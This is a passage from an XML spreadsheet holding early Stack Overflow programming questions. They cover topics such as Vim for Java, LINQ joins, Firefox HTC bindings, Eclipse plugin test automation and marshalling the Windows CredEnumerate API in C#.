&lt;p&gt;Second example:-&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if(ConditionOne)
{
   if(ConditionTwo )
   {
     if(ConditionThree)
     {
       Code to execute
     }
   }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;which is easiest to understand and read bearing in mind that each condition may be a long function name or something.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Tips for using Vim as a Java IDE?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm addicted to Vim, it's now my de facto way of editing text files.&lt;/p&gt;
&lt;p&gt;Being that it's mainly a text editor and not an IDE, has anyone got tricks for me to make it easier when developing Java apps?&lt;/p&gt;
&lt;p&gt;Some questions I have:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;How do I invoke a maven task without leaving vi?&lt;/li&gt;
&lt;li&gt;Can I get code completion?&lt;/li&gt;
&lt;li&gt;How's the syntax highlighting?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Anything else (other than "Don't do it!") that I should know about?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>how to write vb code for custom paging and custom sorting in sql and asp:repeater</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;pl give vb code for custom paging and sorting in asp:repeater using stored procedure&lt;/p&gt;
</t>
  </si>
  <si>
    <t>webservice.htc, moz-behaviors and Firefox 3</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Whilst trying to get our app working in Firefox (I'm a big proponent of X-Browser support but our lead dev is resisting me saying IE is good enough). So I'm doing a little side project to see how much work it is to convert.&lt;/p&gt;
&lt;p&gt;I've hit a problem straight away.&lt;/p&gt;
&lt;p&gt;The main.aspx page binds to a webservice using the IE only method of adding behaviour through a htc file, which is auto-generated by VS I beleive.&lt;/p&gt;
&lt;p&gt; &lt;/p&gt;
&lt;p&gt;Firefox doesn't support this but there is an xml bindings file which can be used to enable htc support (see here: &lt;a href="http://dean.edwards.name/moz-behaviors/overview/" rel="nofollow"&gt;http://dean.edwards.name/moz-behaviors/overview/&lt;/a&gt;). The examples work in FF3 but when I use my webservice.htc as I normally would e.g.:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//Main.aspx
/*SNIP*/
&amp;lt;style type="text/css" media="all"&amp;gt;
    #webservice
    {
        behavior:url(webservice.htc);
        -moz-binding:url(bindings.xml#webservice.htc);
    }
&amp;lt;/style&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body&amp;gt;
&amp;lt;div id="webservice"&amp;gt;&amp;lt;/div&amp;gt; &amp;lt;!-- we use this div to load the webservice stuff --&amp;gt;
/*SNIP*/
//Main.js
webservice.useService(url + asmpath + "/WebServiceWrapper.asmx?WSDL","WebServiceWrapper");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I get webservice is not defined (works fine in IE), I obviously tried&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var webservice = document.getElementById("webservice")
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$("#webservice").useService(url + asmpath + "/WebServiceWrapper.asmx?WSDL","WebServiceWrapper");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;as well which just gives me "useService is not defined" in Firebug. Which leads me to beleive that the binding is not working. However I can see that webservice.htc is being loaded by Firefox in the Firebug console window.&lt;/p&gt;
&lt;p&gt;Anyone got any experience of this?&lt;/p&gt;
&lt;p&gt;Am I going to have to rewrite how the webservice is called?&lt;/p&gt;
&lt;p&gt;Cheers,
Rob&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I insert text at beginning of a multi-line selection in vi/Vim?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In &lt;a href="http://en.wikipedia.org/wiki/Vim_%28text_editor%29"&gt;Vim&lt;/a&gt;, how would I go about inserting characters at the beginning of each line in a selection?&lt;/p&gt;
&lt;p&gt;For instance, let's say I want to comment out a block of code by prepending '//' at the beginning of each line (assuming my language's comment system doesn't allow block commenting like /* */).  How would I do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Fieldsets and legends</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Alright, I know how the &lt;code&gt;fieldset&lt;/code&gt;/&lt;code&gt;legend&lt;/code&gt; works out in HTML. Say you have a form with some fields:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;form&amp;gt;
    &amp;lt;fieldset&amp;gt;
        &amp;lt;legend&amp;gt;legend&amp;lt;/legend&amp;gt;
        &amp;lt;input name="input1" /&amp;gt;
    &amp;lt;/fieldset&amp;gt;
&amp;lt;/form&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What should I use the &lt;code&gt;legend&lt;/code&gt; for? It's being displayed as a &lt;strong&gt;title&lt;/strong&gt;, but isn't a legend semantically an explanation of the contents? In my view, preferably you'd do something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;form&amp;gt;
    &amp;lt;fieldset&amp;gt;
        &amp;lt;legend&amp;gt;* = required&amp;lt;/legend&amp;gt;
        &amp;lt;label for="input1"&amp;gt;input 1 *&amp;lt;/label&amp;gt;&amp;lt;input id="input1" name="input1" /&amp;gt;
    &amp;lt;/fieldset&amp;gt;
&amp;lt;/form&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But that doesn't really work out with how fieldsets are rendered. Is this just a ambigious naming in HTML, or is it my misunderstanding of the English word 'legend'?&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;Edit: fixed some errors ;-)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the practical use of "dynamic" variable in C# 4.0?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is their use if when you call the method, it might not exist?&lt;/p&gt;
&lt;p&gt;Does that mean that you would be able to dynamically create a method on a dynamic object?&lt;/p&gt;
&lt;p&gt;What are the practical use of this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Hidden FreeTextBox bug on Firefox</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a problem with the &lt;a href="http://freetextbox.com/" rel="nofollow"&gt;FreeTextBox&lt;/a&gt; rich Text Editor in my ASP.NET site. The problem occurs when I access the site with firefox, and I have a freetextbox instance in a hidden div. The hidden div might also be an AJAX Tab Panel. The actual problem is that when the page loads it throws an uncaught exception (firebug shows the StoreHtml() function) and halts the postback!! &lt;/p&gt;
&lt;p&gt;Is anywhere of the problem and a solution for it?? &lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Weird #include problem</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a problem with a simple included file.&lt;/p&gt;
&lt;p&gt;The file being included is in two MFC programs - one of which is a dll, and it also compiles itself into a non-mfc dll.&lt;/p&gt;
&lt;p&gt;Recently I was using the larger dll which wraps around the &lt;em&gt;source&lt;/em&gt; of the smaller dll when I wanted access to some of the features of the original code that isn't exposed by the larger dll.&lt;/p&gt;
&lt;p&gt;Since this was a test I simply added the source to my project and called the functions. I got this error: &lt;strong&gt;syntax error : missing ')' before ';'&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The file is correctly included, and I have both the .cpp and the .h in the source folder, and within the project but it wouldn't compile. &lt;/p&gt;
&lt;p&gt;I eventually created a very small test project, main.cpp, spooler.cpp and spooler.h (the spooler is a wrapper around the comms) and tried to compile that. Same issue.&lt;/p&gt;
&lt;p&gt;So I ripped out all the dll related stuff just in case there is a weird issue going on with that and it still won't compile.&lt;/p&gt;
&lt;p&gt;I can't think of the life of me what is wrong. Does anyone else have any ideas?&lt;/p&gt;
&lt;p&gt;p.s. Jeff you really need to add the ability to attach files because the source would fill up too many screens with data.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Have you used the Perl 5.10 backtracking control verbs in your regexes yet?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Have you used the Perl 5.10 backtracking control verbs in your regexes yet? And what problems did they help you accomplish? &lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;Just as background: I have done some fiddling, but I can't get any really useful results.&lt;/p&gt;
&lt;p&gt;As a comparison, when I started getting what the &lt;code&gt;(?&amp;gt;&lt;/code&gt; grouping did, it started showing up more in my regexes. I liked the idea of tuning the world of Perl regex to a particular set of assumptions. As RE languages get more featured, the backtracking has made the performance of REs wildly divergent from the lean and mean FSA that they were based upon. &lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;When someone can tell me what &lt;em&gt;other&lt;/em&gt; implementation of REs has backtracking control verbs--and PCRE &lt;em&gt;does not&lt;/em&gt;, I can concede that it belongs in the general area of expertise of people knowledgeable about regexes. This is a &lt;em&gt;Perl&lt;/em&gt; regex question, and guys helping people out with Ruby, Python, C#, Javascript--or any PCRE client implementations-- probably can't help or see it as a waste of space for the tags they normally read.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I return a joined table as an enumerable on an anonymous return type in linq to sql?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to return an object with the following signature&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class AnonClass{
    string Name {get;}
    IEnumerable&amp;lt;Group&amp;gt; Groups {get;}
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have tried the following query, but g only returns a single entity, not all the joined entities&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var q = from t in dc.Themes
join g in dc.Groups on t.K equals g.ThemeK 
select new {t.Name, Groups = g};
return q.ToArray();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but this returns&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class AnonClass{
   string Name {get;}
   Group Groups{get;}
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What is the correct linq query to use?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MSI Bootstrapping: External URLs</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Much searching has lead me to find several descriptions of how to create a bootstrapping msi, but these solutions all assume the msi is local or a standard Windows component.  Is there a way to make an msi that downloads an installer (which is also an msi) with normal MSI or Wix code rather than by having the bootstrapper execute some non-native program to do so?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Colemak keyboards with Emacs or VIM</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been crossing things out on my TODO list.  I've recently picked up Colemak.  Next I wanted to learn Vim or Emacs.  I was leaning towards Vim, however one of its benefits are sticking to the home row.  With Colemak, the home row has been changed.  I realize that I could remap the keys, but assigning the functionality to different letters is not extremely appealing to me (if there is any relation between letters and their function.  I know movement is not correlated but I'm not sure on all the rest.)&lt;/p&gt;
&lt;p&gt;I don't want to start an argumentative post about text editors, but rather receive comments from Colemak (or Dvorak) users about alternative keymappings and these two editors.&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Design Pattern to apply conversion to multiple properties in multiple classes</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using the WMD markdown editor in a project for a large number of fields that correspond to a large number of properties in a large number of Entity classes. Some classes may have multiple properties that require the markdown.&lt;/p&gt;
&lt;p&gt;I am storing the markdown itself since this makes it easier to edit the fields later. However, I need to convert the properties to HTML for display later on. The question is: is there some pattern that I can use to avoid writing markdown conversion code in all my entity classes?&lt;/p&gt;
&lt;p&gt;I created a utility class with a method that accepts a markdown string and returns the HTML. I am using markdownj and this works fine.&lt;/p&gt;
&lt;p&gt;The problem is for each property of each class that stores markdown I may need another method that converts to HTML:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class Course{
     private String description;
     .
     .
     .
     public String getDescription(){
          return description;
     }
     public String getDescriptionAsHTML(){
          return MarkdownUtil.convert(getDescription());
     }
     .
     .
     .
 }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The problem there is that if the Course class has 2 more properties Tuition and Prerequisites say, that both need converters then I will have to write getTuitionAsHTML() and getPrerequisiteAsHTML().&lt;/p&gt;
&lt;p&gt;I find that a bit ugly and would like a cleaner solution. The classes that require this are not part of a single inheritance hierarchy. &lt;/p&gt;
&lt;p&gt;The other option I am considering is doing this in the controller rather than the model. What are your thoughts on this? &lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
&lt;p&gt;[EDIT]: New thoughts (Thanks Jasper). Since the project uses struts2 (I did not say this before) I could create a view component say  that will convert the markdown for me. Then I use that wherever I need to display the value as HTML.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Converting audio to CAF format for playback on iPhone using OpenAL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using the SoundEngine sample code from Apple in the CrashLanding sample to play back multiple audio files. Using the sample caf files included with CrashLanding everything works fine but when I try and use my own samplesconverted to CAF using afconvert all I get is a stony silence ;)&lt;/p&gt;
&lt;p&gt;Does anyone have settings for afconvert that will produce a CAF file capable of being played back through OpenAL?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best approach for maintaining a quality assurance server for several mid tier clients</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We are getting to the point where we have several mid tier clients that could benefit from a QA server, but none can afford to pay for a dedicated QA box as well as a dedicated production box. I've been toying with the idea of a virtual environment, either hosted in our office or with a third-party, that several clients could hit to view work in progress that would offset the total cost. Most of these sites will be a LAMP stack, but there is the potential every long once in a great while that a .NET or Java site would be thrown into the mix. I'm looking for a solid approach, but obviously not full implementation details.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Access parent property in jQuery callback</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Unsure if I've phrased this correctly, but in the callback how do I reference the controls property of the base class?&lt;/p&gt;
&lt;p&gt;This has been bugging me for some time and I usually work around it, but I'd be grateful if anybody can enlighten me on how I should do this properly.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var base = function() {
    var controls = {};
    return {
    	init: function(c) {
    		this.controls = c
    	},
    	foo: function(args) {
    		this.init(args.controls);
    		$(this.controls.DropDown).change(function() {
    			$(this.controls.PlaceHolder).toggle();
    		});
    	}
    }
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Much Obliged,&lt;/p&gt;
&lt;p&gt;Paul&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Should javac find methods outside of an anonymous class of the same name?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This question is a follow up to:
&lt;a href="http://stackoverflow.com/questions/252267/why-cant-i-call-a-method-outside-of-an-anonymous-class-of-the-same-name"&gt;Why canâ€™t I call a method outside of an anonymous class of the same name&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;This previous question answer &lt;b&gt;why&lt;/b&gt;, but now I want to know if javac &lt;b&gt;should&lt;/b&gt; find run(int bar)?  (See previous question to see why run(42) fails)&lt;/p&gt;
&lt;p&gt;If it shouldn't, is it due to a spec?  Does it produce ambiguous code?  My point is, I think this is a bug.  While the previous question explained why this code fails to compile, I feel it should compile if javac searched higher in the tree if it fails to find a match at the current level.  IE.  If this.run() does not match, it should automatically check NotApplicable.this for a run method.&lt;/p&gt;
&lt;p&gt;Also note that foo(int bar) is correctly found.  If you give any reason why run(int bar) shouldn't be found, it must also explain why foo(int bar) is found.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class NotApplicable {
    public NotApplicable() {
        new Runnable() {
            public void run() {
                // this works just fine, it automatically used NotApplicable.this when it couldn't find this.foo
                foo(42);
                // this fails to compile, javac find this.run(), and it does not match
                run(42);
                // to force javac to find run(int bar) you must use the following
                //NotApplicable.this.run(42);
            }
        };
    }
    private void run(int bar) {
    }
    public void foo(int bar) {
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How do you pass commands to a Cygwin console in Windows using Inno Setup</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've tried variations of this, but had no luck other than the ability to start a cygwin window. (wrapped on &lt;strong&gt;;&lt;/strong&gt; for clarity)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Filename: "c:\cygwin\bin\bash.exe";
  Parameters: "-c c:/scripts/step1.sh paramX";
  Flags: shellexec waituntilterminated;
  StatusMsg: "Running the script..."
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;(this is for an internal install, thus cywin is installed, and all paths, scripts are known)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In Python, is there a concise way of comparing whether the contents of two text files are the same?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I don't care what the differences are.  I just want to know whether the contents are different.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Storing video duration time in sql server</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What's the most appropriate type used to store the duration time information of a video in sql server?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>User Access Checking for Rights on Particular Database Objects or Records</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm having a friendly debate with a developer about a situation where users are logging in and accessing documents in a web application. When we load the document for the user to view, we have the userID in session and the documentID that may be passed via QueryString.&lt;/p&gt;
&lt;p&gt;To prevent the user from modifying the documentID on the QueryString, I propose that the stored procedure that loads the document take the UserId as a parameter to validate rights to the document.&lt;/p&gt;
&lt;p&gt;My developer friend suggests that we run a separate procedure to determine access rights to the document earlier in the page and just run a procedure to grab the document when the document should be shown.&lt;/p&gt;
&lt;p&gt;Are we missing something? Which is most efficient and safe? I thought passing the UserId with the DocID into one procedure call to check rights and pull the document was a more efficient solution.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to get line numbers for stack traces on .Net CF 2.0 or 3.5</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a .Net CF 2.0 application and am using log4net to log errors.  I get a stack trace, but it doesn't have any line numbers.  I noticed that it doesn't appear to deploy the pdb file to the device, so I tried to manually place it in the same directory as the exe.  But that didn't help.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Question SpeechSynthesizer.SetOutputToAudioStream audio format problem</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm currently working on an application which requires transmission of speech encoded to a specific audio format.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;System.Speech.AudioFormat.SpeechAudioFormatInfo synthFormat = 
                        new System.Speech.AudioFormat.SpeechAudioFormatInfo(System.Speech.AudioFormat.EncodingFormat.Pcm, 
                            8000, 16, 1, 16000, 2, null);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This states that the audio is in PCM format, 8000 samples per second, 16 bits per sample, mono, 16000 average bytes per second, block alignment of 2.&lt;/p&gt;
&lt;p&gt;When I attempt to execute the following code there is nothing written to my MemoryStream instance; however when I change from 8000 samples per second up to 11025 the audio data is written successfully.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SpeechSynthesizer synthesizer = new SpeechSynthesizer(); 
waveStream = new MemoryStream(); 
PromptBuilder pbuilder = new PromptBuilder(); 
PromptStyle pStyle = new PromptStyle(); 
pStyle.Emphasis = PromptEmphasis.None; 
pStyle.Rate = PromptRate.Fast; 
pStyle.Volume = PromptVolume.ExtraLoud; 
pbuilder.StartStyle(pStyle); 
pbuilder.StartParagraph(); 
pbuilder.StartVoice(VoiceGender.Male, VoiceAge.Teen, 2); 
pbuilder.StartSentence(); 
pbuilder.AppendText("This is some text."); 
pbuilder.EndSentence(); 
pbuilder.EndVoice(); 
pbuilder.EndParagraph(); 
pbuilder.EndStyle(); 
synthesizer.SetOutputToAudioStream(waveStream, synthFormat);  
synthesizer.Speak(pbuilder); 
synthesizer.SetOutputToNull();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;There are no exceptions or errors recorded when using a sample rate of 8000 and I couldn't find anything useful in the documentation regarding SetOutputToAudioStream and why it succeeds at 11025 samples per second and not 8000. I have a workaround involving a wav file that I generated and converted to the correct sample rate using some sound editing tools, but I would like to generate the audio from within the application if I can.&lt;/p&gt;
&lt;p&gt;One particular point of interest was that the SpeechRecognitionEngine accepts that audio format and successfully recognized the speech in my synthesized wave file...&lt;/p&gt;
&lt;p&gt;Update: Recently discovered that this audio format succeeds for certain installed voices, but fails for others. It fails specifically for LH Michael and LH Michelle, and failure varies for certain voice settings defined in the PromptBuilder.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why don't more .NET applications use MySQL or a DAO that allows for the use of MySQL?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I suppose this question could just as easily be applied to PHP with regard to MSSQL. However, with some versions of MSSQL being so expensive, I always wondered, what is the real advantage of choosing it over MySQL for .NET development? Is it really difficult to use .NET tools in conjunction with a MySQL database? Why not create some sort of DAO that abstracts out the differences between the two so that you can use both? As I consider building .NET apps, I'm always wondering, should I just go with MSSQL, and not even consider MySQL as an option?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Help with CredEnumerate</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As a follow-up to &lt;a href="http://stackoverflow.com/questions/199518/how-to-programatically-add-mapped-network-passwords-winxp"&gt;this&lt;/a&gt; question I am hoping someone can help with the &lt;a href="http://msdn.microsoft.com/en-us/library/aa374794(VS.85).aspx" rel="nofollow"&gt;CredEnumerate&lt;/a&gt; API.  &lt;/p&gt;
&lt;p&gt;As I understand from the documentation the PCREDENTIALS out parameter is a "pointer to an array of pointers to credentials". I am able to successfully call the CredEnumerate API using C# but I am not sure of how to convert the PCREDENTIALS into something useful (like a list of credentials).&lt;/p&gt;
&lt;p&gt;Edit: Here's the code I am using:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;        int count = 0;
        IntPtr pCredentials = IntPtr.Zero;
        bool ret = false;
        ret = CredEnumerate(null, 0, out count, out pCredentials);
        if (ret != false)
        {
            IntPtr[] credentials = new IntPtr[count];
            IntPtr p = pCredentials;
            for (int i = 0; i &amp;lt; count; i++)
            {
                p = new IntPtr(p.ToInt32() + i);
                credentials[i] = Marshal.ReadIntPtr(p);
            }
            List&amp;lt;Credential&amp;gt; creds = new List&amp;lt;Credential&amp;gt;(credentials.Length);
            foreach (IntPtr ptr in credentials)
            {
                creds.Add((Credential)Marshal.PtrToStructure(ptr, typeof(Credential)));
            }
        }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Unfortunately, while this works for the first credential in the arrayâ€”it gets generated and added to the list correctlyâ€”subsequent array items bomb at Marshal.PtrToStructure with the following error:&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Attempted to read or write protected memory. This is often an indication that other memory is corrupt.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Any ideas? Anyone? Bueller?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Forking open source PHP code, project classloader strategy</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been looking for a good PHP ORM tool to use, and I recently found a good ORM class in Kohana. It has a fairly good and simple ORM implementation. The problem is, the code is unreusable outside of the Kohana framework without a rewrite/refactor. It relies on the Kohana class loader and various framework loading strategies to even work in the first place. Further, the required classes aren't packaged into a single dependency directory, or even multiple directories. &lt;/p&gt;
&lt;p&gt;When I do this rewrite, I intend to republish the code via sourceforge or something, and those guys can of course reuse it if they want.  So, should I just package the fileset needed into one directory, and make the appropriate classes do a require_once on any dependant classes, and 2 should I stick with the original class names that are project dependent (like Kohana_exception) even though it is pretty much unrelated to the Kohana project as a whole?&lt;/p&gt;
&lt;p&gt;A second option would be to write another classloader that is a simplified version of the Kohana Framework classloader, and only cares about the ORM related stuff...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Markdown and image alignment</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm helping out a friend with a non-profit site that publishes articles in issues each month. They are mostly straightforward, and I think using a markdown editor (like the wmd one here in SO) would be perfect. However, they do need the ability to have images right-aligned in a given paragraph. I can't see any way to do that with the current system - is it possible?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can you recommend a free Task Board/Burndown tool for Windows?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;There's not a lot to add to the subject really.&lt;/p&gt;
&lt;p&gt;I am after a free task board/ burndown reporting tool for Windows.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Automating unit tests (junit) for Eclipse Plugin development</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am developing Eclipse plugins, and I need to be able to automate the building and execution of the test suite for each plugin.  (Using Junit)&lt;/p&gt;
&lt;p&gt;Test are working within Eclipse, and I can break the plugins into the actual plugin and a fragment plugin for unit testing as described &lt;a href="http://dev.eclipse.org/viewcvs/index.cgi/org.eclipse.test/testframework.html?view=co" rel="nofollow"&gt;here&lt;/a&gt;, &lt;a href="http://rcpquickstart.com/2007/08/06/running-automated-tests-with-pde-build/" rel="nofollow"&gt;here&lt;/a&gt; and in a couple places &lt;a href="http://eclipsenuggets.blogspot.com/2007/09/6-great-links-for-eclipse-build.html" rel="nofollow"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;However, each of the approaches above results in the same issue:  The java ant task/commandline command that issues the build or should trigger the test, generates no observable side effects, and returns the value "13".  I've tried everything I can find, and I've learned a fair bit about how Eclipse starts up (eg: since v3.3 you can no longer use startup.jar -- it doesn't exist -- but you should use &lt;a href="http://blog.ciscavate.org/2008/11/treat-your-mailing-lists-like-reference-documents-please.html" rel="nofollow"&gt;org.eclipse.equinox.launcher&lt;/a&gt;).  Unfortunately, while that is apparently necessary information, it is far from sufficient.&lt;/p&gt;
&lt;p&gt;I am working with Eclipse 3.4, Junit 4.3.1 (the org.junit4 bundle, but I would much rather use JUnit 4.4.  See &lt;a href="http://stackoverflow.com/questions/251791"&gt;here&lt;/a&gt;.)&lt;/p&gt;
&lt;p&gt;So, my question is: How exactly do you automate the build and testing of Eclipse plugins? &lt;/p&gt;
&lt;p&gt;&lt;em&gt;Edit:&lt;/em&gt; To clarify, I &lt;em&gt;want&lt;/em&gt; to use something like ant + cruise control, but I can't even get the unit tests to run &lt;em&gt;at all&lt;/em&gt; outside of Eclipse.  I say "something like" because there are other technologies that accomplish the same thing, and I am not so picky as to discard a solution that works just because it's using say, Maven or Buckminster, if those technologies make this substantially easier.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Edit2:&lt;/em&gt; The 'Java Result 13' mentioned above seems to be caused by the inability to find the coretestrunner.  From the log:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;java.lang.RuntimeException: Application "org.eclipse.test.coretestapplication" could not be found in the registry. The applications available are: org.eclipse.equinox.app.error, com.rcpquickstart.helloworld.application.
    at org.eclipse.equinox.internal.app.EclipseAppContainer.startDefaultApp(EclipseAppContainer.java:242)
    at org.eclipse.equinox.internal.app.MainApplicationLauncher.run(MainApplicationLauncher.java:29)
    at org.eclipse.core.runtime.internal.adaptor.EclipseAppLauncher.runApplication(EclipseAppLauncher.java:110)
    at org.eclipse.core.runtime.internal.adaptor.EclipseAppLauncher.start(EclipseAppLauncher.java:79)
    at org.eclipse.core.runtime.adaptor.EclipseStarter.run(EclipseStarter.java:382)
    at org.eclipse.core.runtime.adaptor.EclipseStarter.run(EclipseStarter.java:179)
    at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
    at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39)
    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
    at java.lang.reflect.Method.invoke(Method.java:597)
    at org.eclipse.equinox.launcher.Main.invokeFramework(Main.java:549)
    at org.eclipse.equinox.launcher.Main.basicRun(Main.java:504)
    at org.eclipse.equinox.launcher.Main.run(Main.java:1236)
    at org.eclipse.equinox.launcher.Main.main(Main.java:1212)
    at org.eclipse.core.launcher.Main.main(Main.java:30)
!ENTRY org.eclipse.osgi 2 0 2008-11-04 21:02:10.514
!MESSAGE The following is a complete list of bundles which are not resolved, see the prior log entry for the root cause if it exists:
!SUBENTRY 1 org.eclipse.osgi 2 0 2008-11-04 21:02:10.515
!MESSAGE Bundle update@plugins/org.eclipse.test_3.2.0/ [34] was not resolved.
!SUBENTRY 2 org.eclipse.test 2 0 2008-11-04 21:02:10.516
!MESSAGE Missing required bundle org.apache.ant_0.0.0.
!SUBENTRY 2 org.eclipse.test 2 0 2008-11-04 21:02:10.516
!MESSAGE Missing required bundle org.eclipse.ui.ide.application_0.0.0.
!SUBENTRY 1 org.eclipse.osgi 2 0 2008-11-04 21:02:10.518
!MESSAGE Bundle update@plugins/org.eclipse.ant.optional.junit_3.2.100.jar [60] was not resolved.
!SUBENTRY 2 org.eclipse.ant.optional.junit 2 0 2008-11-04 21:02:10.519
!MESSAGE Missing host org.apache.ant_[1.6.5,2.0.0).
!SUBENTRY 2 org.eclipse.ant.optional.junit 2 0 2008-11-04 21:02:10.519
!MESSAGE Missing required bundle org.eclipse.core.runtime.compatibility_0.0.0.
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Serializing Name/Value Pairs in a Custom Object via Web Service</t>
  </si>
  <si>
    <t>&lt;p&gt;This is a very complicated question concerning how to serialize data via a web service call, when the data is not-strongly typed.  I'll try to lay it out as best possible.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Sample Storage Object:&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[Serializable]
public class StorageObject {
  public string Name { get; set; }
  public string Birthday { get; set; }
  public List&amp;lt;NameValuePairs&amp;gt; OtherInfo { get; set; }  
}
[Serializable]   
public class NameValuePairs {
  public string Name { get; set; }
  public string Value { get; set; }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Sample Use:&lt;/strong&gt;&lt;/p&gt;
